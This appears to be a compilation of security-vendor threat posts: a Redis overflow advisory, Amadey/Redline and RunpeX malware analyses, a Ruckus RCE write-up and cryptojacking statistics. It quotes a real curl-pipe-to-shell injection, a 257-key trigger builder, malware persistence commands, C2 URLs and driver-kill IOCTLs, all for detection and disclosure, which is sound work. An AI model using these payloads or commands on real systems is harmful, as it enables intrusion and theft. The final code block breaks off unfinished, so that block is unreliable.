
Redis Heap Buffer Overflow Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Redis is a high-performance in-memory key-value data store with optional persistence to disk. It offers fast access to simple but mutable data structures and speaks the Redis Serialization Protocol (RESP), a protocol carried over TCP. Like most modern databases, Redis follows a client-server model: clients create, modify and fetch records held by the Redis server by issuing Redis commands.

  A heap-based buffer overflow vulnerability has been reported in Redis. It is caused by improper validation of user input when Redis extracts the key names from a command.

  A remote attacker can exploit the vulnerability by sending crafted requests to a target server. Successful exploitation can crash the server, causing a denial of service, and in the worst case may allow the attacker to execute arbitrary code in the context of the Redis process.


CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-36824.


Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.5 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is high.
    • Privileges required is low.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 6.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.


Technical Overview:

  The vulnerability is a logic flaw in getKeysUsingKeySpecs() when it processes a command that has more than one key specification. For each specification the function computes the number of matching keys and calls getKeysPrepareResult() with that count alone, without adding the keys already collected from the previous specifications. The keyReference array that result->keys points to can therefore be smaller than the total number of keys, and the assignments to keys[k] run past its end.

  Where the array lives depends on the count passed to getKeysPrepareResult(). If the count is at most MAX_KEYS_BUFFER, result->keys points at the fixed-size result->keysbuf member and the out-of-bounds write is a stack buffer overflow. If the count exceeds MAX_KEYS_BUFFER, result->keys points at a buffer allocated on the heap and the write becomes a heap buffer overflow.
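  To make the sizing mistake concrete, the following Python model is added here (it is not Redis source) to reproduce the two decisions described above: getKeysPrepareResult() keeps result->keys on the MAX_KEYS_BUFFER-slot keysbuf until a larger count is requested, and getKeysUsingKeySpecs() sizes the buffer once per key specification. It tracks only sizes and locations, so nothing is actually overflowed when it runs. The per-specification key counts are made up, and the fixed=True variant, which passes the running total plus the current count, is the repair this example assumes; the page does not describe the vendor patch.

```python
# Model of the key-extraction buffer sizing in Redis getKeysUsingKeySpecs() /
# getKeysPrepareResult(). Added example, not Redis source. It tracks only sizes
# and locations, so it is safe to run: nothing is actually overflowed.

MAX_KEYS_BUFFER = 256  # number of keyReference slots in result->keysbuf


class KeyResultModel:
    """Where result->keys points and how many slots that buffer has."""

    def __init__(self):
        self.size = 0          # 0 means result->keys has not been set yet
        self.on_heap = False   # False: keysbuf on the stack; True: heap allocation

    def prepare(self, numkeys):
        """Mirror getKeysPrepareResult(): start on keysbuf, move to a heap buffer
        of exactly numkeys slots only when numkeys exceeds the current size."""
        if self.size == 0:
            self.size = MAX_KEYS_BUFFER
        if numkeys > self.size:
            self.size = numkeys
            self.on_heap = True


def extract_keys(spec_counts, fixed=False):
    """Walk the key specifications the way getKeysUsingKeySpecs() does.

    spec_counts: number of keys matched by each key specification, in order
                 (e.g. [1, 257] for a command with one fixed key plus 257 more).
    fixed=False: size the buffer from the current spec's count only (vulnerable).
    fixed=True:  size it from k + count, i.e. include keys already collected
                 (the repair this example assumes; the page does not show it).
    Returns (slots_written_out_of_bounds, buffer_location, total_keys).
    """
    result = KeyResultModel()
    k = 0        # index of the next keys[k] slot to fill
    oob = 0      # writes that would land past the end of the buffer
    for count in spec_counts:
        result.prepare(k + count if fixed else count)
        for _ in range(count):
            if k >= result.size:
                oob += 1   # keys[k] is outside the buffer
            k += 1
    return oob, ("heap" if result.on_heap else "stack"), k


if __name__ == "__main__":
    for counts in ([1, 255], [1, 256], [1, 257]):
        print(counts, "vulnerable:", extract_keys(counts),
              "fixed:", extract_keys(counts, fixed=True))
```

  With one key from the first specification, a second specification of 256 keys already writes one slot past keysbuf on the stack; from 257 keys the buffer moves to the heap and the same overrun, by as many slots as the earlier specifications matched, becomes the heap overflow the advisory title refers to.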

  To trigger the vulnerability, an attacker sends a COMMAND GETKEYS or COMMAND GETKEYSANDFLAGS command followed by a specially crafted command whose arguments contain 257 or more keys. An attacker whose credentials carry key pattern permissions can also trigger it by sending the crafted command on its own, because Redis extracts the command's keys in order to check them against the ACL key patterns.

  For instance, the following command can activate the vulnerability:
  

  Several Redis commands with multiple key specifications can be abused in this way. They share a common pattern: exactly two key specifications, the first matching a single key and the second a variable number of keys. The affected commands include:
  

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the vulnerable software.
  • The attacker must have valid credentials on the target server.
  • The attacker credentials must be configured with key pattern permissions (ACL attack vector only).

Triggering Conditions:

  The attacker first authenticates to the target server. From there, two attack vectors are available. In the "GETKEYS attack vector", the attacker sends a "COMMAND GETKEYS" or "COMMAND GETKEYSANDFLAGS" command followed by a specially crafted command containing 257 or more keys. In the "ACL attack vector", the attacker sends the crafted command with 257 or more keys directly; this vector requires that the attacker's ACL rules include key pattern permissions, because Redis extracts the command's keys to check them against those patterns.
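  The GETKEYS vector as bytes on the wire, as an added example that is not SonicWall or Redis code: a minimal RESP2 encoder and parser, a helper that builds a COMMAND GETKEYS request wrapping an inner command with a chosen number of keys, and the check a network sensor can apply, which is to count the inner command's arguments and flag 257 or more. The inner command name XSTORE is a placeholder because the page's list of affected commands is not reproduced above, and the key count is treated as an upper bound since not every argument of every command is a key.

```python
# RESP2 encode/parse and a GETKEYS-vector check for CVE-2023-36824.
# Added example, not Redis or SonicWall code. All traffic here is constructed.

KEY_THRESHOLD = 257            # the advisory's trigger count
GETKEYS_SUBCOMMANDS = (b"GETKEYS", b"GETKEYSANDFLAGS")


def encode_resp(args):
    """Encode a command (list of str/bytes) as a RESP2 array of bulk strings."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def parse_resp_array(data):
    """Parse one RESP2 array of bulk strings. Returns (args, bytes_consumed)."""
    if not data.startswith(b"*"):
        raise ValueError("not a RESP array")
    eol = data.index(b"\r\n")
    count, pos = int(data[1:eol]), eol + 2
    args = []
    for _ in range(count):
        if data[pos:pos + 1] != b"$":
            raise ValueError("expected a bulk string")
        eol = data.index(b"\r\n", pos)
        length, pos = int(data[pos + 1:eol]), eol + 2
        args.append(data[pos:pos + length])
        if data[pos + length:pos + length + 2] != b"\r\n":
            raise ValueError("bulk string not terminated")
        pos += length + 2
    return args, pos


def build_getkeys_probe(num_keys, inner_command=b"XSTORE"):
    """COMMAND GETKEYS <inner_command> dst k1 .. kN with num_keys keys in total.
    XSTORE is a placeholder for a two-key-spec command (one fixed key, then a
    variable list); it is not a real Redis command."""
    keys = [b"dst"] + [b"k%d" % i for i in range(1, num_keys)]
    return encode_resp([b"COMMAND", b"GETKEYS", inner_command] + keys)


def flag_getkeys_request(args, threshold=KEY_THRESHOLD):
    """Detection check: (suspicious, inner_key_count) for one parsed command.
    Every argument after the inner command name is counted as a potential key,
    which over-approximates for commands that also take non-key arguments."""
    if len(args) < 3 or args[0].upper() != b"COMMAND":
        return False, 0
    if args[1].upper() not in GETKEYS_SUBCOMMANDS:
        return False, 0
    inner_key_count = len(args) - 3     # drop COMMAND, subcommand, inner name
    return inner_key_count >= threshold, inner_key_count


if __name__ == "__main__":
    wire = build_getkeys_probe(257)
    args, used = parse_resp_array(wire)
    print(len(wire), "bytes,", used, "consumed ->", flag_getkeys_request(args))
```

  The same parser and threshold also cover the ACL vector if the sensor counts the arguments of the crafted command itself rather than those nested under COMMAND GETKEYS; the difference is only which element of the array is treated as the command name.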

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • RESP
  

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 4016 Redis GETKEYS Heap Buffer Overflow 1

  • IPS: 4017 Redis GETKEYS Heap Buffer Overflow 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signatures above.
  The vendor has released an advisory regarding this vulnerability.

Amadey & Redline Are Still Going Strong

This week, the SonicWall Capture Labs Threat Research Team has observed the following threat:

The Amadey botnet malware has been packaged with the Redline infostealer to infiltrate systems, extract a variety of information, and give the operator control through a C2 server. Both malware families are Russian in origin and are sold on darknet markets for roughly $100-500 USD. Working in tandem, these samples can compromise user accounts and passwords on the infected system as well as online accounts, cryptocurrency wallets and other sensitive information.

Static Analysis

Identifying the parent file (6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf) with Detect It Easy shows that it is a cabinet (CAB) installer (Figure 1) and gives no indication of packers or encryption.

Figure 1: Initial sample detection

Unpacking the parent archive gives five separate files:

  • 9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (32bit .NET DLL)
  • c7eefb8ad88563225d2f6dbf8c172b8f9c762d4568165e7dda0cf5fe99d37bad (32bit .NET EXE)
  • 3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (32bit EXE)
  • 73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (32bit .NET EXE)
  • 59e62d21e9db964ff3d98c7b8be190584754c87d1bbde2dea80c7e9b27b14ed0 (32bit EXE)

Of these files, two immediately show suspicious characteristics: c7e and 73b are both timestomped, with creation timestamps in the future (Figure 2). 73b is also identified as having ConfuserEx obfuscation (Figure 3), which hinders analysis considerably.

Figure 2: Timestamps showing file creation in the year 2090

Figure 3: A creation date of 2067; Confuser Ex is an open-source protection software for .NET software

Looking through strings, file 316 contains a reference to an Amadey.pdb file within its debug strings (Figure 4). A .pdb path is the program-database (debug symbol) path recorded by the compiler at build time; the finished program does not need it, but it leaks the project name the developer used. The API imports listed in Figure 5 cover networking, system enumeration (registry, accounts, files, installed programs and running processes), process injection, data manipulation and security. The accompanying files also assist with network connections and enumeration, with the exception of 9a6, a small (~2 KB) DLL used for DLL side-loading.

Figure 4: String reference to Amadey

Figure 5: API calls within Amadey that confirm some of the malware functionality

Amadey uses multiple evasion methods against both runtime defenses and analysis, including sleeping for long periods, virtual machine and debugger detection (IsDebuggerPresent, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcess) and obfuscation. Removing ConfuserEx from the Redline sample reveals what the file does: it is named ‘Doggeries.exe’ and has a large number of functions for parsing data and for communication, as seen in Figure 6.


Figure 6: Redline deobfuscated, showing a method of communication via email

Dynamic Analysis

Running the main application, files are dropped into the following locations and automatically renamed:

  • “~\Desktop\v5f6rvVc7A.exe”
  • “~\AppData\Local\Temp\IXP000.TMP\”
    • j3346492.exe
    • x3075787.exe
  • “~\AppData\Local\Temp\IXP001.TMP\”
    • i8210436.exe
    • x0248748.exe
  • “~\AppData\Local\Temp\IXP002.TMP\”
    • h8899948.exe
    • g3601528.exe
  • “~\AppData\Local\Temp\925e7e99c5\”
    • pdates.exe
  • “~\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll”

Once the files are dropped, persistence is created during the following steps:

  • ‘schtasks.exe’ is run by ‘pdates.exe’ with the following command, which will run ‘pdates.exe’ once every minute:

‘”System32\schtasks[.]exe” /Create /SC MINUTE /MO 1 /TN pdates[.]exe /TR “~\925e7e99c5\pdates[.]exe” /F’

  • ‘cacls’ (the Windows command-line ACL editor) is used to set permissions on both the file and its directory, first denying and then re-granting access so that the user is left with read-only rights to them:

‘”System32\cmd[.]exe” /k echo Y|CACLS “pdates[.]exe” /P “user:N” && CACLS “pdates[.]exe” /P “user:R” /E && echo Y|CACLS “..\925e7e99c5” /P “user:N” && CACLS “..\925e7e99c5” /P “user:R” /E && Exit’

  • A Windows registry key is changed to the following value so that the payload is started automatically when the user logs on:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders: ~\AppData\Local\Temp\925e7e99c5\
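The three persistence steps above are the kind of activity an endpoint detection rule can catch from process-creation and registry telemetry. The following Python is added here and is not part of the original analysis: it runs such checks over a handful of constructed events modelled on the command lines shown. The event format, user name and paths are made up for the example, and the name of the registry value under User Shell Folders is not stated on the page, so the check matches on the key and the redirected path only.

```python
import re

# Constructed telemetry shaped like the persistence steps described above.
# Not a real Sysmon/EDR export: field names, user name and paths are made up.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate",
     "parent": r"C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe '
                r'/TR "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" /F'},
    {"type": "ProcessCreate",
     "parent": r"C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "user:N" && '
                r'CACLS "pdates.exe" /P "user:R" /E && echo Y|CACLS "..\925e7e99c5" /P "user:N" && '
                r'CACLS "..\925e7e99c5" /P "user:R" /E && Exit'},
    {"type": "RegistryValueSet",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
     "data": r"C:\Users\user\AppData\Local\Temp\925e7e99c5"},
    # Benign control: a daily task pointing at an installed program.
    {"type": "ProcessCreate",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /SC DAILY /TN Updater '
                r'/TR "C:\Program Files\Vendor\update.exe"'},
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def check_schtasks(cmdline):
    """Flag a scheduled task created with a per-minute schedule whose action
    lives under the user's Temp directory."""
    if not re.search(r'schtasks(\.exe)?"?\s+/Create\b', cmdline, re.IGNORECASE):
        return None
    sched = re.search(r"/SC\s+(\w+)", cmdline, re.IGNORECASE)
    every = re.search(r"/MO\s+(\d+)", cmdline, re.IGNORECASE)
    action = re.search(r'/TR\s+"([^"]+)"', cmdline, re.IGNORECASE)
    if sched and sched.group(1).upper() == "MINUTE" and action and TEMP_DIR.search(action.group(1)):
        return "schtasks: runs %s every %s minute(s)" % (
            action.group(1), every.group(1) if every else "?")
    return None


def check_cacls(cmdline, parent):
    """Flag cacls/icacls applying a deny (:N) permission when the launching
    process itself lives under Temp (the file targets are relative, as above)."""
    if not re.search(r"\bi?cacls\b", cmdline, re.IGNORECASE):
        return None
    denies = re.findall(r'/P\s+"?([^"\s]+):N"?', cmdline, re.IGNORECASE)
    if denies and TEMP_DIR.search(parent):
        return "cacls: deny ACL set for %s by a Temp-resident parent" % ", ".join(sorted(set(denies)))
    return None


def check_registry(key, data):
    """Flag a User Shell Folders entry redirected into Temp: Explorer then treats
    that Temp directory as one of the user's special folders."""
    if key.lower().endswith(r"\explorer\user shell folders") and TEMP_DIR.search(data):
        return "registry: User Shell Folders redirected to %s" % data
    return None


def triage(events):
    """Return one finding string per matching event, in event order."""
    findings = []
    for ev in events:
        if ev["type"] == "ProcessCreate":
            hit = check_schtasks(ev["cmdline"]) or check_cacls(ev["cmdline"], ev["parent"])
        elif ev["type"] == "RegistryValueSet":
            hit = check_registry(ev["key"], ev["data"])
        else:
            hit = None
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Each rule keys on a combination rather than a single token: schtasks alone is everyday administration, but a per-minute schedule whose action sits under Temp is not; the same applies to cacls deny ACLs issued from a Temp-resident process and to a special-folder redirect into Temp.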

As this is occurring, another file is run named ‘Healer.exe’ (it will have a randomized name when dropped). The only function ‘Healer’ has is to disable Windows Defender and prevent it from updating, as seen below in Figure 7.

Figure 7: Healer’s functions and targeted registry keys

After ‘Healer’ has been run, ‘pdates.exe’ will reach out to the C2 and download ‘clip64.dll’ (Figure 8).

Figure 8: Communication is established, followed by ‘clip64.dll’ downloading

Clip64 is used to pull data from the clipboard and package it to be sent back to the C2. There is also a reference to Amadey in a .pdb path within the file (Figure 9).


Figure 9: Amadey Clipperdll.pdb reference (left), and clip64.dll capabilities (right)

An additional module named ‘cred64.dll’ also attempts to download, but is unsuccessful (Figure 10). It is unknown whether this is deliberate or accidental on the botnet operator’s part.

Figure 10: The file ‘cred64.dll’ failed to download to the target system

A hook is installed using DirectDrawCreateEx to capture user input and activity. Amadey and Redline will enumerate the system in its entirety to collect hardware specifications, OS version, user accounts, installed software, credentials (in- and out of browser), documents, and cryptocurrency wallet information (Figure 11).

Figure 11: C2 and cryptocurrency information

Amadey and Redline are detected by RTDMI and by the signature Amadey.R (Trojan).

IOCs

Hashes
6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf (parent file)
9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (exhalhENZZbhvzCCmysGrfFiklOcA.dll)
c7eefb8ad88563225d2f6dbf8c172b8f9c762d4568165e7dda0cf5fe99d37bad
3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (Amadey payload)
73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (Redline payload)
59e62d21e9db964ff3d98c7b8be190584754c87d1bbde2dea80c7e9b27b14ed0
2244b4dc9afc6cfab7ef1dea92420e2acd275bac7349b929a69f3c1ae25f5e2f (pdates.exe)
58b02c8b4bc2bf7f5f1e8e45d7c206956f188ae56b648922ca75987b999db503 (clip64.dll)

URLs
77.91.68[.]61/rock/index.php
77.91.68[.]61/Plugins/cred64.dll
77.91.68[.]61/Plugins/clip64.dll
77.91.68[.]61/new/foto4060.exe
77.91.68[.]61/smo/du.exe

Ruckus Wireless Remote Code Execution Vulnerability

RUCKUS Networks designs, sells and services IT networking products such as switches, WLAN controllers, access points, IoT gateways and software. RUCKUS started as a wireless-only company selling to Internet service providers (ISPs), hotel chains and large public venues, and later extended into education.

RUCKUS Wireless Admin Remote Code Execution Vulnerability | CVE-2023-25717
RUCKUS Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

The following is an exploit attempt observed in the wild.

Let’s break down what the attacker is trying to do.

  • login_username=admin: sets the username for the login attempt to “admin”.
  • password=admin$(curl%20http://5.181.80.102/ruckus.sh%20|%20sh: sets the password for the login attempt. This parameter is the interesting part, because it carries a command injection attempt.
  • $(curl%20http://5.181.80.102/ruckus.sh%20|%20sh: uses the shell’s $() command substitution syntax to execute a command from inside the password field. After URL decoding, the command is:
  • curl http://5.181.80.102/ruckus.sh | sh: retrieves a shell script (ruckus.sh) from a remote server at 5.181.80.102 and pipes it to sh, which runs the script’s commands.

In summary, if this request reaches a vulnerable system that passes the password value to a shell, it retrieves and executes a script from the attacker’s server, which can lead to unauthorized access, data theft and further malicious actions.
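The request above can be checked for this pattern before it reaches the login handler. The following Python is an added example, not Ruckus or SonicWall code: it parses the request line, percent-decodes each query parameter and flags values that contain shell command-substitution or pipeline syntax, pulling out any URL the injected command would fetch. The two request lines are constructed; the malicious one follows the shape of the in-the-wild attempt but uses an RFC 5737 documentation address in place of the real server quoted in the text.

```python
import re
from urllib.parse import parse_qs

# Constructed request lines in the shape of the in-the-wild attempt described above.
# The host is an RFC 5737 documentation address; the page quotes the real one.
REQUESTS = [
    "GET /forms/doLogin?login_username=admin&password=admin$(curl%20http://198.51.100.10/ruckus.sh%20|%20sh HTTP/1.1",
    "GET /forms/doLogin?login_username=admin&password=Summer2023%21 HTTP/1.1",
]

# Shell constructs that have no business inside a login form value:
# $( ), backticks, pipes, command separators, ${ } expansion, embedded newlines.
SHELL_META = re.compile(r"\$\(|`|\|\||\||;|&&|\$\{|\n")
FETCH_URL = re.compile(r"https?://[^\s'\"|;)]+")


def parse_request_line(line):
    """Split 'METHOD /path?query HTTP/x' into (method, path, {param: [values]})."""
    method, target, _version = line.split(" ", 2)
    path, _, query = target.partition("?")
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes each value
    return method, path, params


def find_injection(line):
    """Return one finding per parameter whose decoded value carries shell
    metacharacters; each names the path, the parameter and any URL it fetches."""
    _method, path, params = parse_request_line(line)
    findings = []
    for name, values in params.items():
        for value in values:
            if SHELL_META.search(value):
                findings.append({
                    "path": path,
                    "param": name,
                    "value": value,
                    "fetches": FETCH_URL.findall(value),
                })
    return findings


if __name__ == "__main__":
    for req in REQUESTS:
        print(req.split(" ", 2)[1][:40], "->", find_injection(req))
```

Decoding before matching matters: in the raw request the dangerous characters are partly percent-encoded (%20), and a rule that inspects the undecoded bytes can be bypassed by encoding the rest of them too.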

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15864:Ruckus Wireless Admin RCE

RUCKUS has patched this vulnerability.

Cryptojacking Continues Crushing Records

In the early 2020s, ransomware raced upward quarter after quarter, with seemingly no end in sight. But its rush to ascendence was so rapid that it caught the attention of law enforcement, governments and cybersecurity staff, who began working overtime to raise awareness and prevent attacks, and to more quickly catch attackers and bring them to justice when they did occur.

When high-profile cybercriminal arrests occur, it’s often said that one bust is unlikely to move the needle on cybercrime. But what about dozens? Halfway into 2023, it looks like the combination of these busts, general network hardening and a growing emphasis on resiliency is having an effect.

According to exclusive threat data published in the 2023 SonicWall Cyber Threat Report Mid-Year Update, ransomware fell a staggering 41% in the six months between New Year’s Day and the 30th of June, with every region seeing a decline. Combined with 2022 data, which shows volume falling in every quarter save Q4, lower ransomware volumes have gone from being an anomaly or part of the background ebb and flow to a bona fide trend. But why?

We’re All Just Looking for Security. (Even Cybercriminals.)

It’s already becoming harder to believe, but there was a time when cybercriminals aspired to be household names. Ransomware groups attempted to trade on their reputation to more reliably collect huge sums of money, but in the age of greater scrutiny, notoriety has become a liability.

To be clear, ransomware isn’t going away—threat trends are cyclical, and despite being despicable, crime still pays. But based on our data, cybercriminals in 2023 seem to be favoring a much greater degree of subtlety, slinking back into the shadows to conduct their craft in secret. When the question changes from “How can we make the most money possible” to “How can we best make money without getting caught,” the answer changes, too—and so far this year, that answer has been encrypted threats, IoT malware and cryptojacking.

Attacks over HTTPS rose 22% in the first half of 2023, giving SonicWall the highest year-to-date volume of any year since it began tracking this threat type. IoT malware jumped to 77.9 million, up 37% over the same period in 2022 and higher than any other six-month period on record. But it was cryptojacking that saw the most growth.

Cryptojacking’s Climb Accelerates

Until 2022, cryptojacking hits had never surpassed the 100 million mark during any year. But the full-year total for 2022 reached 139.3 million, a record high.

In 2023, cryptojacking had surpassed even that high-water mark by early April … and then continued to grow. In all, cryptojacking volume in the first half of 2023 reached 332.3 million, an increase of 399% year-to-date.

Four months out of six set new monthly volume records, and the amount of cryptojacking seen in May 2023—77.6 million hits—eclipsed the full year totals recorded in 2018 and 2019, and easily surpassed total mid-year volume for 2020, 2021 and 2022.

Who’s Being Targeted?

In short, everyone: Every region saw an increase in cryptojacking compared with the first half of 2022. With the exception of Asia, which saw just 1% more cryptojacking year-to-date, these spikes were substantial. Latin America recorded 32% more cryptojacking than in the first half of 2022, but even this was small compared with the 345% increase observed in North America. Worse, Europe saw a staggering 788% spike.

A country-by-country look also shows massive increases. The U.S. saw 340% more cryptojacking hits than in the first six months of 2022. And in Europe, Germany and the U.K. recorded increases of 139% and 479% respectively. India provided a rare counterexample—cryptojacking hits there actually fell 73% year to date.

Cryptojacking by Industry

Unfortunately, a look at cryptojacking by industry shows no such bright spots. In all the industries we studied in depth, cryptojacking was up—and not just a little bit.

To be clear, cryptojacking numbers were quite small leading up to 2023—and any time you’re dealing with fairly small numbers growing very quickly, percentage increases become a less useful way to look at this change than factor increases.

In the first six months of 2023, the number of cryptojacking hits on retail customers more than doubled, with the average percentage of customers targeted each month rising from 0.06% to 0.3%.

Finance customers saw 4.7 times the number of cryptojacking hits, with the percentage targeted on a monthly basis increasing from 0.05% to 0.36%.

Those working in healthcare recorded 69 times as many hits as in the first half of 2022, with the percentage of customers targeted spiking from 0.06% to 0.32%.

Our government customers were targeted by 89 times the amount of cryptojacking compared with this time last year, with the average percentage of customers seeing an attack each month jumping from 0.17% to 0.37%.

But education customers recorded the biggest increase: cryptojacking on education customers skyrocketed to a staggering 320 times the number of attacks recorded in the first half of 2022, with the percentage of customers targeted monthly averaging 0.19% last year and 0.55% this year.

Where Will Cryptojacking Go from Here?

While any prediction is an imprecise science, based on historical data alone, we can expect cryptojacking to continue to rise as 2023 wears on. But even if it doesn’t, cryptojacking volumes for 2023 still stand an excellent chance of surpassing the combined volumes of every year before it, all the way back to 2018 when SonicWall began tracking this threat type.

Regardless of what happens, SonicWall will continue to closely monitor cryptojacking levels—and with the threat of cryptojacking on the rise, expect expanded coverage of this attack type when our next Cyber Threat Report is released at the beginning of 2024.

Until then, you can learn more about cryptojacking, ransomware and other threats—along with which locations and industries are being targeted—in the Mid-Year Update to the 2023 SonicWall Cyber Threat Report.

RunpeX Abuses Legitimate AntiMalware Driver

The SonicWall Capture Labs Research team has observed RunpeX abusing a vulnerable version of a kernel driver belonging to Zemana AntiMalware. RunpeX is a protector and malware injector based on the KoiVM .NET protector, and it is widely used to deliver malware families such as Remcos, Formbook, AgentTesla, Redline and Vidar. The legitimate, signed driver dropped by RunpeX is used to kill or disable AV/EDR processes that are normally protected. This technique is known as Bring Your Own Vulnerable Driver (BYOVD) and has previously been employed by APT groups, AV/EDR killer tools and ransomware actors.

Layer 1:

The first-stage loader is a .NET application that contains the encrypted second-stage payload hardcoded in a byte array. The array is decrypted and the result is executed with the Assembly.Load() method.

Figure 1: Byte array contains encrypted second-stage loader and InvokeMethod() function 

 

Before executing the second-stage payload, a function named “Do()” is called to bypass AMSI detection by patching the AmsiScanBuffer() function in memory.

Figure 2: Function to bypass AMSI  

Layer 2:

The second-stage loader is RunpeX itself, a .NET payload protected with a customized KoiVM virtualizer. It is responsible for installing the Zemana AntiMalware driver.

Figure 3: Decompiled code of second-stage payload

 

To disable security solutions, the second-stage payload drops and installs the Zemana driver. The driver is written to the root of the C: drive as “Zemana.sys” and is signed by “Zemana Ltd.”

Figure 4: Driver is signed by “Zemana Ltd”

 

To install the driver, RunpeX elevates its privileges with the CMSTP UAC bypass technique, executing the following command:

  • “c:\windows\system32\cmstp.exe /au C:\windows\temp\1brdhu0p.inf”

Figure 5: Privilege escalation and UAC bypass using cmstp.exe

 

The INF file used in this UAC bypass is similar to the file present on GitHub.

Figure 6: Content of inf file

 

Next, a driver service named “Zemana” is created to load the driver.

Figure 7: Service named “Zemana” is created to load driver

 

RunpeX then obtains a handle to the loaded driver’s device with CreateFileA():

Figure 8: Code snippet to retrieve driver handle

 

Using that handle, RunpeX sends IOCTL code 0x80002010 to register itself with the driver as a trusted process.

Figure 9: IOCTL used to add process in trusted list

 

Finally, RunpeX sends IOCTL code 0x80002048, passing a process ID as the parameter, to have the driver terminate the target process. It uses this IOCTL to terminate every process named in its configuration list.

Figure 10: IOCTL used to terminate security software processes
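The two control codes above carry structure worth decoding, and the order in which they are sent is the detectable part of the technique. The following Python is an added example, not RunpeX or Zemana code: it splits each code into the CTL_CODE fields (device type, required access, function number, transfer method) and then walks a constructed sequence of driver calls to report which caller registered itself and then asked the driver to kill other PIDs. Only the two IOCTL values come from the analysis above; the PIDs and the trace are made up, and the driver’s device name is not known from the page and is not assumed.

```python
# Decode the driver control codes RunpeX sends and spot the register-then-kill
# sequence in a call trace. Added example, not RunpeX or Zemana code.
# The two codes are taken from the analysis above; the trace is constructed.

IOCTL_REGISTER_TRUSTED = 0x80002010   # add calling process to the driver's trusted list
IOCTL_TERMINATE_PROCESS = 0x80002048  # terminate the process whose PID is passed

ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
METHOD = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
          2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}


def decode_ioctl(code):
    """Split a Windows CTL_CODE into its fields: DeviceType (bits 31-16),
    RequiredAccess (15-14), FunctionCode (13-2), TransferType (1-0)."""
    function = (code >> 2) & 0xFFF
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": ACCESS[(code >> 14) & 0x3],
        "function": function,
        "method": METHOD[code & 0x3],
        # 0x800-0xFFF is the function range Microsoft reserves for vendor-defined codes
        "vendor_defined": function >= 0x800,
    }


def analyse_trace(trace):
    """trace: iterable of (caller_pid, ioctl_code, argument) in call order.
    Returns the PIDs that were registered as trusted, the PIDs each caller asked
    the driver to terminate, and the callers that followed the BYOVD pattern
    (register first, then terminate)."""
    registered, kills, pattern = set(), {}, []
    for caller, code, arg in trace:
        if code == IOCTL_REGISTER_TRUSTED:
            registered.add(arg)
        elif code == IOCTL_TERMINATE_PROCESS:
            kills.setdefault(caller, []).append(arg)
            if caller in registered and caller not in pattern:
                pattern.append(caller)
    return {"registered": registered, "kills": kills, "byovd_callers": pattern}


# Constructed trace: PID 4242 (the injector) registers itself, then terminates
# two PIDs from its configuration list; PID 5000 issues a kill without registering.
SAMPLE_TRACE = [
    (4242, IOCTL_REGISTER_TRUSTED, 4242),
    (4242, IOCTL_TERMINATE_PROCESS, 1337),
    (4242, IOCTL_TERMINATE_PROCESS, 2001),
    (5000, IOCTL_TERMINATE_PROCESS, 1337),
]

if __name__ == "__main__":
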